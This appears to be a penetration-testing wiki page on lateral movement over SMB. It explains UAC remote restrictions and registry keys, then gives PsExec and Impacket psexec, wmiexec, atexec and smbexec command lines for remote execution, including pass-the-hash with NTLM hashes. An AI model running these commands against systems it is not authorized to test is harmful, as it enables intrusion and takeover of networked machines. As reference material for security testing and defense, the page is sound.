# SMB protocol ## Introduction Lateral movement consists of techniques that enable an attacker to access and control remote systems. SMB protocol is a well known candidate for this purpose. ## Requirements ### Definitions There are 5 types of users: * Local users * With admin privileges on the machine * RID500 * Non-RID500 * Without admin privileges on the machine * Domain users * With admin privileges on machines * Without admin privileges on machines {% hint style="info" %} RID500 is the built-in local admin account used for installing or recovering purpose (usually named Administrator). {% endhint %} ### UAC remote restrictions Judging from [microsoft](https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows) and [harmj0y](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/), we can say following things: * Local admin privileges are **required** to WmiExec or PsExec * Non-RID 500 local admin accounts **cannot** WmiExec or PsExec on WinVista+ machines * Domain users with admin privileges on machine **can** * RID 500 local admin account **can** WmiExec or PsExec on machines | | PsExec, WmiExec, SmbExec, AtExec, etc. | | ----------------------------------------------- | -------------------------------------- | | Local users | No | | Local admins | No | | Local admin RID 500 | **Yes** | | Domain users **without** local admin privileges | No | | Domain users **with** local admin privileges | **Yes** | {% hint style="info" %} **To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:** * reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG\_DWORD /f /d 1 **To prevent RID 500 from being able to WmiExec or PsExec, execute:** * reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG\_DWORD /f /d 1 {% endhint %} ## Tools ### PsExec On Windows, use Sysinternal's PsExec: ```bash PsExec64.exe \\WIN01 -accepteula -s -u localadmin -p L0c4l4dm1n "cmd" PsExec64.exe \\192.168.10.60 -accepteula -s -u localadmin -p b26906d7457cbe74931011c3c5d1ac92 "cmd" ``` On Kali, use Impacket's PsExec: ```bash psexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "cmd" psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "cmd" ``` ### WmiExec On Kali, use Impacket's WmiExec: ```bash wmiexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig" wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig" ``` ### AtExec On Kali, use Impacket's AtExec: ```bash atexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig" atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig" ``` ### SmbExec On Kali, use Impacket's SmbExec: ```bash smbexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 ``` ## References * [microsoft](https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows) * [harmj0y](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)